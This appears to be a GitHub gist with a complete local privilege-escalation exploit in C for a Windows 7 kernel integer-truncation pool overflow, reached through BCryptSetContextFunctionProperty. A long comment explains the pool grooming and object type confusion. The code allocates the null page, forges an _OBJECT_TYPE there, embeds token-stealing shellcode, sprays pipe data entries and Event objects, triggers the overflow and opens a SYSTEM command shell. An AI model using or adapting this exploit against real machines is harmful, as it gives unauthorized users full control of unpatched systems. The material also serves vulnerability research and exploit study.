@vp777
Created July 17, 2021 18:09
/*
The vulnerable function takes as input an array of bytes and outputs their hex representation as Unicode (two-byte) characters. The hex-encoded bytes are separated by a space (0x20).
For example:
user input : 0 129
output buffer (vulnerable_chunk): 30 00 30 00 20 00 38 00 31 00 20 00
With regards to the vulnerability itself, the problem exists in the output buffer (vulnerable_chunk) size calculation:
vulnerable_chunk_size = (user_controlled_size*6)%65536;
vulnerable_chunk = AllocateMemory(vulnerable_chunk_size);
convert_to_hex(vulnerable_chunk, user_input, user_controlled_size*6);
As we can see, vulnerable_chunk_size is 16 bits wide, so the result of the multiplication gets truncated when the user-provided size is big enough.
The problem is that the truncated multiplication result is used for the buffer allocation, but the non-truncated multiplication result is used for the actual processing of the data.
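The size mismatch can be reproduced with plain arithmetic. The sketch below is only an illustration: the helper names (bytes_written, alloc_size, overflow_size) are hypothetical and not taken from the vulnerable driver, and the factor of 6 is the one from the pseudocode above (two hex characters plus a space, two bytes each).

```c
#include <assert.h>
#include <stdint.h>

// Hypothetical helper: number of bytes the conversion routine writes.
// Each input byte becomes 3 two-byte characters (2 hex digits + space).
static uint32_t bytes_written(uint32_t input_size) {
    assert(input_size <= UINT32_MAX / 6u);  // keep the 32-bit product exact
    return input_size * 6u;
}

// Hypothetical helper: size used for the allocation, i.e. the same
// product truncated to 16 bits (equivalent to "% 65536").
static uint16_t alloc_size(uint32_t input_size) {
    return (uint16_t)(bytes_written(input_size) & 0xffffu);
}

// Bytes written past the requested allocation size.
// This is always a multiple of 65536 (zero when nothing is truncated).
static uint32_t overflow_size(uint32_t input_size) {
    return bytes_written(input_size) - alloc_size(input_size);
}
```

For the input size used in this exploit (0x37ff), the allocation is requested with 0x4ffa bytes while 0x14ffa bytes are written, so the write runs 0x10000 bytes past the requested size.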
Exploitation:
The plan now is to use the object type confusion technique described by Nikita Tarakanov in http://2014.zeronights.org/assets/files/slides/data-only-pwning-windows-kernel.pptx:
we change the type of an object with the overflow and make its _OBJECT_TYPE address point to 0. From there, we forge a fake _OBJECT_TYPE through which we gain code execution.
A good writeup on the technique can be found over: https://h0mbre.github.io/HEVD_Pool_Overflow_32bit/
We have some problems in this specific situation:
1. vulnerable_chunk deallocation
One important property of this overflow is that the vulnerable_chunk gets deallocated by the end of the call to the vulnerable function.
What that means is that we have to be careful when picking the vulnerable_chunk size.
This is crucial because, after the overflow, the next chunk will be overwritten with random data, which will trigger a bugcheck if, for example, the allocator expects a valid pool header on the next chunk (e.g. to merge consecutive free chunks).
To work around this issue, we use allocations serviced by the big pool (no pool headers) whose size satisfies (size & 0xfff) > 0xfe0, which avoids the use of fragments (splitting unused page memory).
Tarjei Mandt created an extensive resource on Windows 7 pool internals: https://www.exploit-db.com/docs/english/16032-kernel-pool-exploitation-on-windows-7.pdf
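The size constraint from (1) can be checked mechanically. This is a minimal sketch, not part of the exploit: the function names are hypothetical, and it assumes 4 KiB pages and that any request larger than one page is serviced by the big pool. The 0xfe0 threshold is the one quoted above.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define SKETCH_PAGE_SIZE 0x1000u  // assumption: 4 KiB pages
#define FRAGMENT_LIMIT   0xfe0u   // threshold quoted in the text above

// Allocation size after the 16-bit truncation of input_size * 6.
static uint32_t truncated_alloc_size(uint32_t input_size) {
    assert(input_size <= UINT32_MAX / 6u);
    return (input_size * 6u) & 0xffffu;
}

// True when input_size (a) actually triggers the truncation,
// (b) yields an allocation larger than a page (assumed big pool), and
// (c) leaves too little room in the last page for a fragment.
static bool is_usable_input_size(uint32_t input_size) {
    uint32_t alloc = truncated_alloc_size(input_size);
    bool overflows = input_size * 6u > 0xffffu;
    bool big_pool = alloc > SKETCH_PAGE_SIZE;
    bool no_fragment = (alloc & 0xfffu) > FRAGMENT_LIMIT;
    return overflows && big_pool && no_fragment;
}
```

Under these assumptions the check accepts 0x37ff (the value used by this exploit) as well as the ranges 0x32a6-0x32aa and 0x3551-0x3555, and rejects their immediate neighbours such as 0x32a5 and 0x32ab.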
2. The overflow size && vulnerable_chunk
Since the overflow size will be at least 65536 bytes (the written size and the truncated size differ by a multiple of 65536), we have to make sure the vulnerable chunk is placed next to user-controlled memory whose size is at least equal to the overflow size.
We achieve that by creating a large number of data entries (https://www.alex-ionescu.com/?p=231). We then pick a point after which we expect the memory to be defragmented, free a data_entry and make the vulnerable chunk fall into that area:
Initial Stage:
|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|
Free Stage
|data_entry|data_entry|data_entry|__free chunk__|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|
Alloc Stage
|data_entry|data_entry|data_entry|++vulnerable_chunk++|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|
<--------------------overflow_size------------------------------>
3. Finding a suitable kernel object
We shouldn't have a problem picking a suitable kernel object. Our only restriction is having them fall within reach of the overflow.
We follow a strategy similar to the one in (2): we free a data entry at the tail of our buffer and allocate a number of kernel objects, so that the allocator gives the freed pages of the data entry to the kernel objects:
Initial Stage:
|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|
Free Stage:
|data_entry|data_entry|data_entry|data_entry|+data_entry soon to be vulnerable_chunk+|data_entry|data_entry|__free chunk__|data_entry|data_entry|
Alloc Stage:
|data_entry|data_entry|data_entry|data_entry|+data_entry soon to be vulnerable_chunk+|data_entry|data_entry|+ko+|+ko+|+ko+|data_entry|data_entry|
4. Object Type && overflow data limitations
As we have seen before, the overflow is composed only of the bytes 0, space (0x20) and digits (0x30-0x39).
Index 0 of ObTypeIndexTable holds 0, as do the entries at indexes 0x30 and above (these are unused entries that hold the value 0).
The only problematic index would be 0x20, since it would be a valid entry for an object.
Even so, the odds are in our favor, and we should still be able to keep the space out of the object type index with proper alignment of the chunks.
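To make the alignment argument concrete: with an all-zero input buffer, the output repeats the 6-byte pattern 30 00 30 00 20 00, so the byte written at any offset from the start of vulnerable_chunk depends only on that offset modulo 6. The sketch below is an illustration under that assumption; the names are hypothetical and no specific _OBJECT_HEADER offset is implied.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

// Output for one zero input byte: '0', '0', ' ' as two-byte characters.
static const uint8_t ZERO_INPUT_PATTERN[6] = {0x30, 0x00, 0x30, 0x00, 0x20, 0x00};

// Byte written at the given offset from the start of vulnerable_chunk,
// assuming every input byte is zero.
static uint8_t output_byte_at(size_t offset) {
    return ZERO_INPUT_PATTERN[offset % 6];
}

// True when the byte at this offset would be the space (0x20), i.e. the
// one value that is problematic as an object type index.
static bool lands_on_space(size_t offset) {
    return output_byte_at(offset) == 0x20;
}
```

Only offsets with offset % 6 == 4 receive 0x20, so shifting the distance between vulnerable_chunk and the target byte by a couple of bytes is enough to land on 0x00 or 0x30 instead.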
5. Overflowing the kernel object with random data
The function handling the CloseHandle call (nt!ObpCloseHandle) doesn't make heavy use of the overflown fields which allows us to get away with using a badly corrupted object.
One important functionality performed when the handle of an object is closed is to verify whether that object is used by some other code and if not, to free the underlying heap memory.
This functionality is implemented through the PointerCount && HandleCount fields of _OBJECT_HEADER, which are essentially counters of the references to an object.
When their values drop down to zero, it means that the kernel can free the memory used by the object.
Since we have corrupted the pool header with random data, we don't want the chunk to get freed as it will trigger various bugchecks within the allocator.
Conveniently, our overflow filled these fields with random data (big values) so the heap memory of the object won't get deallocated
Epilogue:
More or less the same approach should work on Windows 7 x64 before the backported patch that restricts null page allocation.
Some information on how one could exploit this on Windows 7 without using the null page in addition to some thoughts on Windows 10 exploitation can be found over:
https://github.com/vp777/Windows-Non-Paged-Pool-Overflow-Exploitation
*/
#include <Windows.h>
#include <winternl.h>
#include <Bcrypt.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "Bcrypt.lib")
//a lot of sizes are usable here, e.g.
//0x3555*6 % 65536 = 0x3ffe, the size will be rounded to 0x4000, no fragment will be created
//the value used below: 0x37ff*6 % 65536 = 0x4ffa, the size will be rounded to 0x5000
//0x32a6-0x32aa, 0x3551-0x3555, ... should also be usable
#define BCRYPT_BUFFER_SIZE 0x37ff
#define DATA_ENTRY_HEADER_SIZE 0x2c
#define GROOMING_PIPES_NUMBER 500
#define PAGE_SIZE 4096
#define GROOMING_ALLOC_SIZE (4*PAGE_SIZE)
#define EVENTS_NUMBER 10000
char* g_buf;
typedef struct {
HANDLE r;
HANDLE w;
} PIPE_HANDLES;
void create_pipe(PIPE_HANDLES* ph) {
CreatePipe(&ph->r,
&ph->w,
NULL,
0x100000);
}
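void write_pipe(PIPE_HANDLES ph, size_t sz) {
DWORD written = 0; //WriteFile expects a valid byte-count pointer when no OVERLAPPED is passed
WriteFile(ph.w,
g_buf,
(DWORD)(sz - DATA_ENTRY_HEADER_SIZE),
&written,
NULL);
}
void read_pipe(PIPE_HANDLES ph, size_t sz) {
DWORD read = 0; //ReadFile expects a valid byte-count pointer when no OVERLAPPED is passed
ReadFile(ph.r,
g_buf,
(DWORD)(sz - DATA_ENTRY_HEADER_SIZE),
&read,
NULL);
}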
void bcrypt(void)
{
memset(g_buf, 0, BCRYPT_BUFFER_SIZE);
BCryptSetContextFunctionProperty(
CRYPT_LOCAL,
L"Default",
BCRYPT_CIPHER_INTERFACE,
L"AES",
L"Property",
BCRYPT_BUFFER_SIZE,
(PUCHAR)g_buf
);
}
bool allocate_null_page() {
DWORD(WINAPI * NtAllocateVirtualMemory)(HANDLE ProcessHandle, PVOID * BaseAddress, ULONG ZeroBits, PULONG RegionSize, ULONG AllocationType, ULONG Protect);
*(FARPROC*)&NtAllocateVirtualMemory = GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtAllocateVirtualMemory");
PVOID pBaseAddr = (PVOID)1;
ULONG uSize = 0x1000;
return NtAllocateVirtualMemory(GetCurrentProcess(), &pBaseAddr, 0, &uSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) == 0;
}
int main() {
PIPE_HANDLES grooming_handles[GROOMING_PIPES_NUMBER], extra_pipe;
char shellcode[] = "\xc6\x05\x00\x09\x00\x00\x01\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x50\x8B\xC8\x8B\x80\xB8\x00\x00\x00\x2D\xB8\x00\x00\x00\x83\xB8\xB4\x00\x00\x00\x04\x75\xEC\x8B\x90\xF8\x00\x00\x00\x89\x91\xF8\x00\x00\x00\xC2\x10\x00";
/*
//doesn't appear to be necessary, this is a way to communicate with the userspace code that our shellcode has been executed
0x0000000000000000: C6 05 00 09 00 00 01 mov byte ptr [0x900], 1;
//start of token stealing shellcode
0x0000000000000007: 33 C0 xor eax, eax
0x0000000000000009: 64 8B 80 24 01 00 00 mov eax, dword ptr fs:[eax + 0x124]
0x0000000000000010: 8B 40 50 mov eax, dword ptr [eax + 0x50]
0x0000000000000013: 8B C8 mov ecx, eax
0x0000000000000015: 8B 80 B8 00 00 00 mov eax, dword ptr [eax + 0xb8]
0x000000000000001b: 2D B8 00 00 00 sub eax, 0xb8
0x0000000000000020: 83 B8 B4 00 00 00 04 cmp dword ptr [eax + 0xb4], 4
0x0000000000000027: 75 EC jne 0x15
0x0000000000000029: 8B 90 F8 00 00 00 mov edx, dword ptr [eax + 0xf8]
0x000000000000002f: 89 91 F8 00 00 00 mov dword ptr [ecx + 0xf8], edx
0x0000000000000035: C2 10 00 ret 0x10
*/
g_buf = (char*)malloc(0x10000);
for (int i = 0; i < 1000; i++) {
CreateEvent(NULL, FALSE, FALSE, NULL);
}
for (int i = 0; i < GROOMING_PIPES_NUMBER; i++) {
create_pipe(&grooming_handles[i]);
}
create_pipe(&extra_pipe);
printf("[+] Allocating NULL page\r\n");
if (!allocate_null_page()) {
printf("[-] Couldn't allocate null page\n");
return 0;
}
printf("[+] Forging an _OBJECT_TYPE on null page\n");
memset(NULL, 0, 0x1000);
memcpy((void*)0x74, "\x00\x05\x00\x00", 4);
memcpy((void*)0x500, shellcode, sizeof(shellcode));
printf("[+] Spraying big pool to create a big contiguous chunk\r\n");
for (int i = 0; i < GROOMING_PIPES_NUMBER; i++) {
write_pipe(grooming_handles[i], GROOMING_ALLOC_SIZE);
}
//we could probably have injected some free chunks here and there to increase reliability if needed
printf("[+] Creating some holes at the tail of the buffer for the Events\r\n");
for (int i = GROOMING_PIPES_NUMBER-16; i < GROOMING_PIPES_NUMBER-10; i++) {
read_pipe(grooming_handles[i], GROOMING_ALLOC_SIZE);
}
printf("[+] Attempting to fill the holes\r\n");
HANDLE hevents[EVENTS_NUMBER];
for (int i = 0; i < EVENTS_NUMBER; i++)
hevents[i] = CreateEvent(NULL, FALSE, FALSE, NULL);
//just to make sure the following freed chunks will have high probability of reallocation in bcrypt
for (int i = 0; i < 0; i++) {
write_pipe(extra_pipe, BCRYPT_BUFFER_SIZE * 6 % 65536);
}
printf("[+] Creating some holes at the head of the buffer for the bcrypt vulnerable_chunk\r\n");
read_pipe(grooming_handles[GROOMING_PIPES_NUMBER-19], GROOMING_ALLOC_SIZE);
read_pipe(grooming_handles[GROOMING_PIPES_NUMBER-18], GROOMING_ALLOC_SIZE);
read_pipe(grooming_handles[GROOMING_PIPES_NUMBER-17], GROOMING_ALLOC_SIZE);
printf("[+] Triggering the overflow in bcrypt\r\n");
bcrypt();
printf("[+] Closing the handles of smashed objects and redirecting control flow\r\n");
volatile char* done = (volatile char*)0x900;
for (int i = 0; i < EVENTS_NUMBER && !*done; i++)
CloseHandle(hevents[i]);
printf("[+] Done\r\n\r\n");
system("cmd.exe");
}